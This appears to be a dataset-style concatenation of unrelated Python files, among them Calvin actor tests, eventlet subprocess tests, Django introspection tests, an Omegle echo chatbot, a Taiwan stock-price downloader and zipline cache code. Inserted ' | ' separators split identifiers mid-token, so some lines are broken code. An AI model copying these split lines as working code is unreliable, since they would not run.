actor = actor_manager.actors[actor_id]
actor._calvinsys = Mock()
return actor
@pytest.fixture
def actor():
return create_actor(DummyNode())
@pytest.mark.parametrize("port_type,port_name,port_property,value,expected", [
("invalid", "", "", "", False),
("in", "missing", "", "", False),
("out", "missing", "", "", False),
("out", "token", "missing", "", False),
("in", "token", "missing", "", False),
("out", "token", "name", "new_name", True),
("out", "token", "name", "new_name", True),
])
def test_set_port_property(port_type, port_name, port_property, value, expected):
assert actor().set_port_property(port_type, port_name, port_property, value) is expected
@pytest.mark.parametrize("inport_ret_val,outport_ret_val,expected", [
(False, False, False),
(False, True, False),
(True, False, False),
(True, True, True),
])
def test_did_connect(actor, inport_ret_val, outport_ret_val, expected):
for port in actor.inports.values():
port.is_connected = Mock(return_value=inport_ret_val)
for port in actor.outports.values():
port.is_connected = Mock(return_value=outport_ret_val)
actor.fsm = Mock()
actor.did_connect(None)
if expected:
actor.fsm.transition_to.assert_called_with(Actor.STATUS.ENABLED)
assert actor._calvinsys.scheduler_wakeup.called
else:
assert not actor.fsm.transition_to.called
assert not actor._calvinsys.scheduler_wakeup.called
@pytest.mark.parametrize("inport_ret_val,outport_ret_val,expected", [
(True, True, False),
(True, False, False),
(False, True, False),
(False, False, True),
])
def test_did_disconnect(actor, inport_ret_val, outport_ret_val, expected):
for port in actor.inports.values():
port.is_connected = Mock(return_value=inport_ret_val)
for port in actor.outports.values():
port.is_connected = Mock(return_value=outport_ret_val)
actor.fsm = Mock()
actor.did_disconnect(None)
if expected:
actor.fsm.transition_to.assert_called_with(Actor.STATUS.READY)
else:
assert not actor.fsm.transition_to.called
def test_enabled(actor):
actor.enable()
assert actor.enabled()
actor.disable()
assert not actor.enabled()
def test_connections():
node = DummyNode()
node.id = "node_id"
actor = create_actor(node)
inport = actor.inports['token']
outport = actor.outports['token']
port = Mock()
port.id = "x"
peer_port = Mock()
peer_port.id = "y"
inport.attach_endpoint(LocalInEndpoint(port, peer_port))
outport.attach_endpoint(LocalOutEndpoint(port, peer_port))
assert actor.connections(node) == {
'actor_id': actor.id,
'actor_name': actor.name,
'inports': {inport.id: (node, "y")},
'outports': {outport.id: [(node, "y")]}
}
def test_state(actor):
inport = actor.inports['token']
outport = actor.outports['token']
correct_state = {
'_component_members': set([actor.id]),
'_deployment_requirements': [],
'_managed': set(['dump', '_signature', 'id', '_deployment_requirements', 'name', 'credentials']),
'_signature': None,
'dump': False,
'id': actor.id,
'inports': {'token': {'fifo': {'N': 5,
'fifo': [{'data': 0, 'type': 'Token'},
{'data': 0, 'type': 'Token'},
{'data': 0, 'type': 'Token'},
{'data': 0, 'type': 'Token'},
{'data': 0, 'type': 'Token'}],
'read_pos': {inport.id: 0},
'readers': [inport.id],
'tentative_read_pos': {inport.id: 0},
'write_pos': 0},
'id': inport.id,
'name': 'token'}},
'name': '',
'outports': {'token': {'fanout': 1,
'fifo': {'N': 5,
'fifo': [{'data': 0, 'type': 'Token'},
{'data': 0, 'type': 'Token'},
{'data': 0, 'type': 'Token'},
{'data': 0, 'type': 'Token'},
{'data': 0, 'type': 'Token'}],
'read_pos': {},
'readers': [],
'tentative_read_pos': {},
'write_pos': 0},
'id': outport.id,
'name': 'token'}}}
test_state = actor.state()
for k, v in correct_state.iteritems():
# Read state use list to support JSON serialization
if isinstance(v, set):
assert set(test_state[k]) == v
else:
assert test_state[k] == v
@pytest.mark.parametrize("prev_signature,new_signature,expected", [
(None, "new_val", "new_val"),
("old_va | l", "new_val", "old_val")
])
def test_set_signature(actor, prev_signature, new_signature, expected):
actor.signature_set(prev_sig | nature)
actor.signature_set(new_signature)
assert actor._signature == expected
def test_component(actor):
actor.component_add(1)
assert 1 in actor.component_members()
actor.component_add([2, 3])
assert 2 in actor.component_members()
assert 3 in actor.component_members()
actor.component_remove(1)
assert 1 not in actor.component_members()
actor.component_remove([2, 3])
assert 2 not in actor.component_members()
assert 3 not in actor.component_members()
def test_requirements(actor):
assert actor.requirements_get() == []
actor.requirements_add([1, 2, 3])
assert actor.requirements_get() == [1, 2, 3]
actor.requirements_add([4, 5])
assert actor.requirements_get() == [4, 5]
actor.requirements_add([6, 7], extend=True)
assert actor.requirements_get() == [4, 5, 6, 7]
|
fabsx00/joern-tools | joerntools/mlutils/pythonEmbedder/PythonEmbedder.py | Python | gpl-3.0 | 2,124 | 0.01177 | import os
from FeatureArray import FeatureArray
from FeatureArrayToMatrix import FeatureArrayToMatrix
class Embedder:
def embed(self, directory, tfidf = True):
"""
For a given directory containing a TOC and a data/
directory as, for example, created by joern-demux,
create an embedding in libsvm format and save it
as "embedding.libsvm" in the directory.
"""
featureArray = self._createFeatureArray(directory)
self.termDocMatrix = self._createTermDocumentMatrix(featureArray)
if tfidf:
self.termDocMatrix.tfidf()
self._outputInLIBSVMFormat(directory)
def _createFeatureArray(self, directory):
featureArray = FeatureArray()
dataDir = os.path.join(directory, 'data')
filenames = os.listdir(dataDir)
for f in filenames:
label = f
filename = os.path.join(dataDir, f)
items = file(filename, 'r').readlines()
featureArray.add(label, items)
return featureArray
def _createTermDocumentMatrix(self, featureArray):
converter = FeatureArrayToMatrix()
return converter.convertFeatureArray(featureArray)
def _outputInLIBSVMFormat(self, directory):
from scipy.sparse import csc_matrix
if self.termDocMatrix.matrix == None: return
m = csc_matrix(self.termDocMatrix.matrix)
nCols = m.shape[1]
outFilename = os.path.join(directory, 'embedding.libsvm')
outFile = file(outFilename, 'w')
for i in xrange(nCols):
label = self.termDocMatrix.index2Doc[i]
col = m.getcol(i)
entries = [(i,col[i,0]) for i in col.indices]
entries.sort()
features = " ".join(['%d:%f' % e for e in entries])
row = '%s %s #%s\n' % (label, features, label)
outFile.write(row)
|
outFile.close()
if __name__ == '__main__':
import sys
embeder = Em | bedder()
embeder.embed(sys.argv[1])
|
team-phoenix/Phoenix | frontend/python/updaters/sqlTableUpdater.py | Python | gpl-2.0 | 50,004 | 0.00792 | import os
from collections import OrderedDict
from .sqldatabase import SqlDatabase
from .retrieve_core_info import retrieveCoreInfo
# Root class that all SQL table updaters derive from
class SqlTableUpdater():
def __init__(self, tableName, tableColumns=[], coreInfo={}):
self.tableName = tableName
self.columnsDict = OrderedDict(tableColumns)
self.dbFile = os.path.join(os.getcwd().replace("python", "metadata"), "libretro.sqlite")
self.dbFileExists = os.path.isfile(self.dbFile)
self.coreInfo = coreInfo
# self.filterUnusedCores()
def updateTable(self):
pass
def updateColumns(self, database, additionalStatement: str = ""):
if not self.dbFileExists:
database.createTable(self.tableName, self.columnsDict, additionalStatement)
else:
try:
database.deleteTable(self.tableName)
except:
database.createTable(self.tableName, self.columnsDict, additionalStatement)
def __del__(self):
print("Updated " + self.tableName + " table.")
def libretroSystemList(self):
systems = []
for k, v in self.coreInfo['cores'].items():
if "categories" not in v or v["categories"] != "Emulator":
continue
if "database" in v:
name = v["database"].split("|")
for n in name:
systems.append(n)
# Split console and manufacturer names
# Not really necessary for Libretro identifiers
#tup = n.split(" - ")
#
## "MAME"
#if len(tup) == 1:
# systems.append(tup[0])
#
## Nearly every one
#elif len(tup) == 2:
# systems.append(tup[1])
#
## Sega - Master System - Mark III
## Sega - Mega Drive - Genesis
#elif len(tup) == 3:
# syste | ms.append(tup[1] | )
# There are some cores that do not have "database" defined
elif "systemname" in v:
systems.append(v["systemname"])
systems = list(set(systems))
systems.sort()
return systems
# This map defines all Libretro-based systems that Phoenix supports. If it isn't in here, it isn't supported by Phoenix!
# TODO: Place this information into an entirely separate database
# WARNING: Do NOT change Phoenix UUIDs (1st column), even if there are spelling mistakes. Change friendlyName if you really need to.
phoenixSystemDatabase = {
# friendlyName: North American console name without manufacturer
# shortName: Abbreviation (typically 3 letters)
# enabled: True iff a core is available, Phoenix can run it, and the game scanner can find it (extensions set)
# Everything else
"Arcade": {"enabled": False, "defaultCore": "mame_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
# Conspicuously missing from No-Intro
"Amstrad - CPC": {"enabled": False, "defaultCore": "cap32_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Amstrad" },
"Atari - 2600": {"enabled": True, "defaultCore": "stella_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Capcom - CP System I": {"enabled": False, "defaultCore": "fb_alpha_cps1_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CP System II": {"enabled": False, "defaultCore": "fb_alpha_cps2_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CP System III": {"enabled": False, "defaultCore": "fbalpha2012_cps3_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"Capcom - CPS Changer": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Capcom" },
"CHIP-8": {"enabled": False, "defaultCore": "emux_chip8_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"DOS": {"enabled": False, "defaultCore": "dosbox_libretro", "friendlyName": "", "shortName": "", "manufacturer": "(Various)" },
"Mattel - Intellivision": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Mattel" },
"Nintendo - Game & Watch": {"enabled": False, "defaultCore": "gw_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Nintendo" },
"Sinclair - ZX81": {"enabled": False, "defaultCore": "81_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Sinclair" },
"SNK - Neo Geo": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "SNK" },
# No-Intro, both official and non-official (ROM-based games)
"Atari - 5200": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - 7800": {"enabled": False, "defaultCore": "mess2014_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - Jaguar": {"enabled": True, "defaultCore": "virtualjaguar_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - Lynx": {"enabled": True, "defaultCore": "mednafen_lynx_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Atari - ST": {"enabled": True, "defaultCore": "hatari_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Atari" },
"Bandai - WonderSwan Color": {"enabled": True, "defaultCore": "mednafen_wswan_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Bandai - WonderSwan": {"enabled": True, "defaultCore": "mednafen_wswan_libretro", "friendlyName": "", "shortName": "", "manufacturer": "Bandai" },
"Casio - Loopy": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Casio" },
"Casio - PV-1000": {"enabled": False, "defaultCore": "", "friendlyName": "", "shortName": "", "manufacturer": "Casio" },
"Coleco - ColecoVision": {"enabled": False, "defaultCore": "mess2014_libretro", |
kawamon/hue | desktop/core/ext-py/eventlet-0.24.1/tests/subprocess_test.py | Python | apache-2.0 | 3,313 | 0.000302 | import sys
import time
import eventlet
from eventlet.green import subprocess
import eventlet.patcher
import tests
original_subprocess = eventlet.patcher.original('subprocess')
def test_subprocess_wait():
# https://bitbucket.org/eventlet/eventlet/issue/89
# In Python 3.3 subprocess.Popen.wait() method acquired `timeout`
# argument.
# RHEL backported it to their Python 2.6 package.
cmd = [sys.executable, "-c", "import time; time.sleep(0.5)"]
p = subprocess.Popen(cmd)
ok = False
t1 = time.time()
try:
p.wait(timeout=0.1)
except subprocess.TimeoutExpired as e:
str(e) # make sure it doesn't throw
assert e.cmd == cmd
| assert e.timeout == 0.1
ok = True
tdiff = time.time() - t1
assert ok, 'did not raise subprocess.TimeoutExpired'
assert 0.1 <= tdiff <= 0.2, 'did not stop within allowed time'
def test_communicate_with_poll():
# This test was being skipped since git 25812fca8, I don't there's
# a need to do this. The original comment:
#
# https://github.com | /eventlet/eventlet/pull/24
# `eventlet.green.subprocess.Popen.communicate()` was broken
# in Python 2.7 because the usage of the `select` module was moved from
# `_communicate` into two other methods `_communicate_with_select`
# and `_communicate_with_poll`. Link to 2.7's implementation:
# http://hg.python.org/cpython/file/2145593d108d/Lib/subprocess.py#l1255
p = subprocess.Popen(
[sys.executable, '-c', 'import time; time.sleep(0.5)'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t1 = time.time()
eventlet.with_timeout(0.1, p.communicate, timeout_value=True)
tdiff = time.time() - t1
assert 0.1 <= tdiff <= 0.2, 'did not stop within allowed time'
def test_close_popen_stdin_with_close_fds():
p = subprocess.Popen(
['ls'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
shell=False,
cwd=None,
env=None)
p.communicate(None)
try:
p.stdin.close()
except Exception as e:
assert False, "Exception should not be raised, got %r instead" % e
def test_universal_lines():
p = subprocess.Popen(
[sys.executable, '--version'],
shell=False,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate(None)
def test_patched_communicate_290():
# https://github.com/eventlet/eventlet/issues/290
# Certain order of import and monkey_patch breaks subprocess communicate()
# with AttributeError module `select` has no `poll` on Linux
# unpatched methods are removed for safety reasons in commit f63165c0e3
tests.run_isolated('subprocess_patched_communicate.py')
def test_check_call_without_timeout_works():
# There was a regression that'd result in the following exception:
# TypeError: check_call() missing 1 required keyword-only argument: 'timeout'
subprocess.check_call(
['ls'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
def test_exception_identity():
# https://github.com/eventlet/eventlet/issues/413
# green module must keep exceptions classes as stdlib version
tests.run_isolated('subprocess_exception_identity.py')
|
SThomasP/ECSSystemsBot | TestProcedures/GetWebPage.py | Python | gpl-3.0 | 1,077 | 0.011142 | from urllib.request import urlopen
for line in urlopen('https://secure.ecs.soton.ac.uk/status/'):
line = line.decode('utf-8') # Decoding the binary data to text.
if 'Core Priority Devices' in line: #look for 'Core Priority Devices' To find the line of text with the list of issues
linesIWant = line.split('Priority Devices')[2].split("<tr")
linesIWant.pop()
linesIWant.pop(0)
issues=[]
for f in linesIWant:
if not 'border: 0p | x' in f:
if 'machine' in f:
machineName=f.split('<b>')[1].split('</b>')[0]
if 'state_2' in f:
service=f.split('<td>')[2].split('</td>')[0]
problem=f.split('<td>')[3].split('</td>')[0]
issues.append(service+','+machineName+','+problem+'\n')
elif 'state_2' in f:
service=f.split('<td>') | [1].split('</td>')[0]
problem=f.split('<td>')[2].split('</td>')[0]
issues.append(service+','+machineName+','+problem+'\n')
logfile=open('newlog.txt','w')
logfile.writelines(issues)
logfile.close()
|
tomviner/exploring-unittesting-talk | code-examples/test_unittest_suite.py | Python | apache-2.0 | 610 | 0.008197 | import unittest
def add(a, b):
return | a + b
class TestKnownGood(unittest.TestCase):
def __init__(self, input, output) | :
super(TestKnownGood, self).__init__()
self.input = input
self.output = output
def runTest(self):
self.assertEqual(add(*self.input), self.output)
def suite():
suite = unittest.TestSuite()
known_values = [
((1, 2), (3)),
((2, 3), (5)),
]
suite.addTests(TestKnownGood(input, output)
for input, output in known_values)
return suite
if __name__ == '__main__':
unittest.TextTestRunner().run(suite()) |
need12648430/OmegaPy | Chatbot.py | Python | mit | 980 | 0.040816 | """
demo: simple chatbot
connects with a stranger greeting them with "hi, i'm a chatbot"
then proceeds to echo all messag | es sent to it
"""
from Omegle import *
import time
class SimpleChatbot(OmegleHandler):
def on_connect(self):
print "stranger connected"
greeting = "hi, i'm a chatbot"
self.omegle.send(greeting)
print "y > " + greeting
def on_typing_start(self):
print "stranger | is typing..."
def on_typing_stop(self):
print "stranger stopped typing."
def on_message(self, message):
print "s > " + message
# pretend to type for 1 second to look real
self.omegle.start_typing()
time.sleep(1)
# send message
self.omegle.send(message)
# tell omegle we're done "typing"
self.omegle.stop_typing()
print "y > " + message
def on_disconnect(self):
print "stranger disconnected, next please"
self.omegle.start_chat(OmegleChat.Classic)
chatbot = SimpleChatbot()
omegle = OmegleChat(chatbot)
omegle.start_chat(OmegleChat.Classic) |
vsajip/django | tests/regressiontests/introspection/tests.py | Python | bsd-3-clause | 6,655 | 0.003606 | from __future__ import absolute_import,unicode_literals
from functools import update_wrapper
from django.db import connection
from django.test import TestCase, skipUnlessDBFeature, skipIfDBFeature
from django.utils import six
from .models import Reporter, Article
#
# The introspection module is optional, so methods tested here might raise
# NotImplementedError. This is perfectly acceptable behavior for the backend
# in question, but the tests need to handle this without failing. Ideally we'd
# skip these tests, but until #4788 is done we'll just ignore them.
#
# The easiest way to accomplish this is to decorate every test case with a
# wrapper that ignores the exception.
#
# The metaclass is just for fun.
#
def ignore_not_implemented(func):
def _inner(*args, **kwargs):
try:
return func(*args, **kwargs)
except NotImplementedError:
return None
update_wrapper(_inner, func)
return _inner
class IgnoreNotimplementedError(type):
def __new__(cls, name, bases, attrs):
for k,v in attrs.items():
if k.startswith('test'):
attrs[k] = ignore_not_implemented(v)
return type.__new__(cls, name, bases, attrs)
class IntrospectionTests(six.with_metaclass(IgnoreNotimplementedError, TestCase)):
def test_table_names(self):
tl = connection.introspection.table_names()
self.assertEqual(tl, sorted(tl))
self.assertTrue(Reporter._meta.db_table in tl,
"'%s' isn't in table_list()." % Reporter._meta.db_table)
self.assertTrue(Article._meta.db_table in tl,
"'%s' isn't in table_list()." % Article._meta.db_table)
def test_django_table_names(self):
cursor = connection.cursor()
cursor.execute('CREATE TABLE django_ixn_test_table (id INTEGER);')
tl = connection.introspection.django_table_names()
cursor.execute("DROP TABLE django_ixn_test_table;")
self.assertTrue('django_ixn_testcase_table' not in tl,
"django_table_names() returned a non-Django table")
def test_django_table_names_retval_type(self):
# Ticket #15216
cursor = connection.cursor()
cursor.execute('CREATE TABLE django_ixn_test_table (id INTEGER);')
tl = connection.introspection.django_table_na | mes(only_existin | g=True)
self.assertIs(type(tl), list)
tl = connection.introspection.django_table_names(only_existing=False)
self.assertIs(type(tl), list)
def test_installed_models(self):
tables = [Article._meta.db_table, Reporter._meta.db_table]
models = connection.introspection.installed_models(tables)
self.assertEqual(models, set([Article, Reporter]))
def test_sequence_list(self):
sequences = connection.introspection.sequence_list()
expected = {'table': Reporter._meta.db_table, 'column': 'id'}
self.assertTrue(expected in sequences,
'Reporter sequence not found in sequence_list()')
def test_get_table_description_names(self):
cursor = connection.cursor()
desc = connection.introspection.get_table_description(cursor, Reporter._meta.db_table)
self.assertEqual([r[0] for r in desc],
[f.column for f in Reporter._meta.fields])
def test_get_table_description_types(self):
cursor = connection.cursor()
desc = connection.introspection.get_table_description(cursor, Reporter._meta.db_table)
self.assertEqual(
[datatype(r[1], r) for r in desc],
['IntegerField', 'CharField', 'CharField', 'CharField', 'BigIntegerField']
)
# Oracle forces null=True under the hood in some cases (see
# https://docs.djangoproject.com/en/dev/ref/databases/#null-and-empty-strings)
# so its idea about null_ok in cursor.description is different from ours.
@skipIfDBFeature('interprets_empty_strings_as_nulls')
def test_get_table_description_nullable(self):
cursor = connection.cursor()
desc = connection.introspection.get_table_description(cursor, Reporter._meta.db_table)
self.assertEqual(
[r[6] for r in desc],
[False, False, False, False, True]
)
# Regression test for #9991 - 'real' types in postgres
@skipUnlessDBFeature('has_real_datatype')
def test_postgresql_real_type(self):
cursor = connection.cursor()
cursor.execute("CREATE TABLE django_ixn_real_test_table (number REAL);")
desc = connection.introspection.get_table_description(cursor, 'django_ixn_real_test_table')
cursor.execute('DROP TABLE django_ixn_real_test_table;')
self.assertEqual(datatype(desc[0][1], desc[0]), 'FloatField')
def test_get_relations(self):
cursor = connection.cursor()
relations = connection.introspection.get_relations(cursor, Article._meta.db_table)
# Older versions of MySQL don't have the chops to report on this stuff,
# so just skip it if no relations come back. If they do, though, we
# should test that the response is correct.
if relations:
# That's {field_index: (field_index_other_table, other_table)}
self.assertEqual(relations, {3: (0, Reporter._meta.db_table)})
def test_get_key_columns(self):
cursor = connection.cursor()
key_columns = connection.introspection.get_key_columns(cursor, Article._meta.db_table)
self.assertEqual(key_columns, [('reporter_id', Reporter._meta.db_table, 'id')])
def test_get_primary_key_column(self):
cursor = connection.cursor()
primary_key_column = connection.introspection.get_primary_key_column(cursor, Article._meta.db_table)
self.assertEqual(primary_key_column, 'id')
def test_get_indexes(self):
cursor = connection.cursor()
indexes = connection.introspection.get_indexes(cursor, Article._meta.db_table)
self.assertEqual(indexes['reporter_id'], {'unique': False, 'primary_key': False})
def test_get_indexes_multicol(self):
"""
Test that multicolumn indexes are not included in the introspection
results.
"""
cursor = connection.cursor()
indexes = connection.introspection.get_indexes(cursor, Reporter._meta.db_table)
self.assertNotIn('first_name', indexes)
self.assertIn('id', indexes)
def datatype(dbtype, description):
"""Helper to convert a data type into a string."""
dt = connection.introspection.get_field_type(dbtype, description)
if type(dt) is tuple:
return dt[0]
else:
return dt
|
arokem/pyAFQ | examples/plot_afq_reco80.py | Python | bsd-2-clause | 2,044 | 0.002446 | """
==========================
RecoBundles80 using AFQ API
==========================
An example using the AFQ API to run recobundles with the
`80 bundle atlas <https://figshare.com/articles/Advanced_Atlas_of_80_Bundles_in_MNI_space/7375883>`_.
"""
import os.path as op
import plotly
from AFQ.api.group import GroupAFQ
import AFQ.data.fetch as afd
##########################################################################
# Get some example data
# ---------------------
#
# Retrieves `Stanford HARDI dataset <https://purl.stanford.edu/ng782rw8378>`_.
#
afd.organize_stanford_data(clear_previous_afq=True)
##########################################################################
# Set tractography parameters (optional)
# ---------------------
# We make this tracking_params which we will pass to the AFQ object
# which specifies that we want 50,000 seeds randomly distributed
# in the white matter.
#
# We only do this to make this example faster and consume less space.
tracking_params = dict(n_seeds=50000,
random_seeds=Tru | e,
rng_seed=42)
##########################################################################
# Initialize an AFQ object:
# -------------------------
#
# We specify seg_algo as reco80 in segmentation_params. This tells the AFQ
# object to perform RecoBundles using the 80 bundles atlas in the
# segmentation step.
myafq = GroupAFQ(bids_path=op.join(afd.afq_home,
| 'stanford_hardi'),
preproc_pipeline='vistasoft',
segmentation_params={"seg_algo": "reco80"},
tracking_params=tracking_params)
##########################################################################
# Visualizing bundles and tract profiles:
# ---------------------------------------
# This would run the script and visualize the bundles using the plotly
# interactive visualization, which should automatically open in a
# new browser window.
bundle_html = myafq.all_bundles_figure
plotly.io.show(bundle_html["01"])
|
kaija/tw-stock | stock.py | Python | mit | 11,215 | 0.009362 | import datetime
i | mport httplib
import urllib
import os.path
import csv
import time
from datetime import timedelta
import pandas as pd
import numpy as np
def isfloat(value):
try:
float(value)
return | True
except ValueError:
return False
def totimestamp(dt, epoch=datetime.date(1970,1,1)):
td = dt - epoch
# return td.total_seconds()
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6
class stockImport(object):
def __init__(self
):
print ('setup stock importer')
def saveDate(self, date=None):
date_str = date.strftime("%m/%d/%Y")
print('{} finished'.format(date_str))
f = open('./twstock.tmp', 'w')
f.write(date_str)
def loadDate(self):
try:
f = open('./twstock.tmp', 'r')
date_str = f.readline()
#default set to 4 PM
return datetime.datetime.strptime(date_str + " 16:00:00", "%m/%d/%Y %H:%M:%S")
except IOError:
return datetime.datetime.strptime("1/1/2010 16:00:00", "%m/%d/%Y %H:%M:%S")
def downloadData(self):
start_day = datetime.date(2004, 2, 11);
today = datetime.date.today()
one_day = timedelta(days=1)
y, m, d, h, min, sec, wd, yd, i = datetime.datetime.now().timetuple()
end_time = today
if h > 16:
end_time = today + one_day
print "start download missing data"
print "checking from " + start_day.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d")
print "checking end time " + end_time.strftime("%Y-%m-%d")
download_date = start_day
while download_date < end_time:
file_name = "data/" + download_date.strftime("%Y%m%d") + ".csv"
if os.path.isfile(file_name):
download_date += one_day
continue
httpreq = httplib.HTTPConnection('www.twse.com.tw')
#http://www.twse.com.tw/exchangeReport/MI_INDEX?response=csv&date=20170526&type=ALL
#headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
print
date_str = str(download_date.year - 1911 ) + download_date.strftime("/%m/%d")
form = urllib.urlencode({'download': 'csv', 'qdate': date_str, 'selectType': 'ALLBUT0999'})
#httpreq.request("POST", "/ch/trading/exchange/MI_INDEX/MI_INDEX.php", form, headers);
full_url = "exchangeReport/MI_INDEX?response=csv&date=" + download_date.strftime("%Y%m%d") + "&type=ALL"
print full_url
httpreq.request("GET", "http://www.twse.com.tw/exchangeReport/MI_INDEX?response=csv&date=" + download_date.strftime("%Y%m%d") + "&type=ALL");
httpres = httpreq.getresponse()
stock_csv = httpres.read()
print "downloading " + file_name
f = open(file_name, "w")
f.write(stock_csv)
download_date += one_day
def insertToStock(self, stockid, row, date):
try:
date_str = date.strftime("%Y-%m-%d")
df = pd.DataFrame.from_csv('bystock/' + stockid + '.csv')
#check if there is a key
df.loc[date_str].count()
#key already exist. skip it
except KeyError:
#no such key. insert it
df = pd.concat([df, row])
df.to_csv('bystock/' + stockid + '.csv')
#print df
except IOError:
print('stock id: {} not exist'.format(stockid))
row.to_csv('bystock/' + stockid + '.csv')
def prepcsv(self, csv):
ret = []
for i in csv:
tmp = i
tmp = tmp.replace(',', '')
tmp = tmp.replace('\'', '')
tmp = tmp.replace('\"', '')
tmp = tmp.replace('=', '')
ret.append(tmp)
return ret
def convertCSV(self, file_path=None, date=None):
print('convert csv {}'.format(file_path))
with open(file_path, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for row in spamreader:
if len(row) < 16:
#abnormal some column missing?
continue
#if len(row) == 17:
#abnormal should not more than 16 column
#print(row)
if len(row) == 17:
stockid=row[0].replace('=', '')
stockid=stockid.replace('"', '')
stockid=stockid.strip()
if stockid.startswith('('):
continue
checkrow = row[11].replace(',', '')
checkrow = checkrow.replace('"', '')
checkrow = checkrow.replace('=', '')
if not checkrow[0].isdigit():
#skip column title
continue
row = self.prepcsv(row)
TV=int(row[2])
TC=int(row[3])
TO=int(row[4])
RD=row[9]
if RD == '+':
DF=float(row[10])
RD=1
elif RD == '-':
DF=0-float(row[10])
RD=-1
else:
DF=0
RD=0
PE=float(row[15])
try:
OP=float(row[5])
CP=float(row[8])
HP=float(row[6])
LP=float(row[7])
except ValueError:
OP=None
CP=None
HP=None
LP=None
#print('OP:{} CP:{} HP:{} LP:{} DF:{} RD:{} TV:{} TC:{} TO:{}\n'.format( OP, CP, HP, LP, DF, RD, TV, TC, TO))
cols = ['OP', 'CP', 'HP', 'LP', 'DF', 'RD', 'TV', 'TC', 'TO']
date_index = pd.date_range(date.strftime("%m/%d/%Y"), periods=1)
df1 = pd.DataFrame([[OP, CP, HP, LP, DF, RD, TV, TC, TO]], columns=cols)
df1['date'] = date_index
df1 = df1.set_index(['date'])
#print stockid
#print df1
self.insertToStock(stockid, df1, date)
self.saveDate(date)
def getExpectCP(self, df, date):
today = datetime.date.today()
one_day = timedelta(days=1)
if date > today:
#print "over today"
#print date.strftime("%Y-%m-%d")
return None
try:
date_str = date.strftime("%Y-%m-%d")
return df.loc[date_str, 'CP']
except KeyError as e:
return self.getExpectCP(df, date + one_day)
def loadTrainDataById(self, stock_id, start_date, days, expect):
one_day = timedelta(days=1)
stop_date = start_date + one_day * days
expect_date = start_date + one_day * (days + expect)
today = datetime.date.today()
if stop_date > today:
return None
try:
start_date_str = start_date.strftime("%Y-%m-%d")
stop_date_str = stop_date.strftime("%Y-%m-%d")
expect_date_str = expect_date.strftime("%Y-%m-%d")
df = pd.DataFrame.from_csv('bystock/' + stock_id + '.csv')
print "from:" + start_date_str + " to:" + stop_date_str
dft = df.loc[start_date_str:stop_date_str]
#print dft.as_matrix()
#print dft.reset_index().values
dfcp = df.loc[start_date_str:stop_date_str, 'CP']
#print df.loc[start_date_str:expect_date_str, 'CP']
expcp = self.getExpectCP(df, expect_date)
if expcp == None:
return
#print dfcp
print 'max during train:' + str(dfcp.max())
print str(expect) + ' days ' + expect_date_str + ' close price' + str(expcp)
if expcp > dfcp.max():
print 'up'
else:
|
humdings/zipline | zipline/utils/cache.py | Python | apache-2.0 | 10,994 | 0 | """
Caching utilities for zipline
"""
from collections import MutableMapping
import errno
import os
import pickle
from distutils import dir_util
from shutil import rmtree, move
from tempfile import mkdtemp, NamedTemporaryFile
import pandas as pd
from .context_tricks import nop_context
from .paths import ensure_directory
from .sentinel import sentinel
class Expired(Exception):
"""Marks that a :class:`CachedObject` has expired.
"""
ExpiredCachedObject = sentinel('ExpiredCachedObject')
AlwaysExpired = sentinel('AlwaysExpired')
class CachedObject(object):
"""
A simple struct for maintaining a cached object with an expiration date.
Parameters
----------
value : object
The object to cache.
expires : datetime-like
Expiration date of `value`. The cache is considered invalid for dates
**strictly greater** than `expires`.
Examples
--------
>>> from pandas import Timestamp, Timedelta
>>> expires = Timestamp('2014', tz='UTC')
>>> obj = CachedObject(1, expires)
>>> obj.unwrap(expires - Timedelta('1 minute'))
1
>>> obj.unwrap(expires)
1
>>> obj.unwrap(expires + Timedelta('1 minute'))
... # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
Expired: 2014-01-01 00:00:00+00:00
"""
def __init__(self, value, expires):
self._value = value
self._expires = expires
@classmethod
def expired(cls):
"""Construct a CachedObject that's expired at any time.
"""
return cls(ExpiredCachedObject, expires=AlwaysExpired)
def unwrap(self, dt):
"""
Get the cached value.
Returns
-------
value : object
The cached value.
Raises
------
Expired
Raised when `dt` is greater than self.expires.
"""
expires = self._expires
if expires is AlwaysExpired or expires < dt:
raise Expired(self._expires)
return self._value
def _unsafe_get_value(self):
"""You almost certainly shouldn't use this."""
return self._value
class ExpiringCache(object):
"""
A cache of multiple CachedObjects, which returns the wrapped the value
or raises and deletes the CachedObject if the value has expired.
Parameters
----------
cache : dict-like, optional
An instance of a dict-like object which needs to support at least:
`__del__`, `__getitem__`, `__setitem__`
If `None`, than a dict is used as a default.
Examples
--------
>>> from pandas import Timestamp, Timedelta
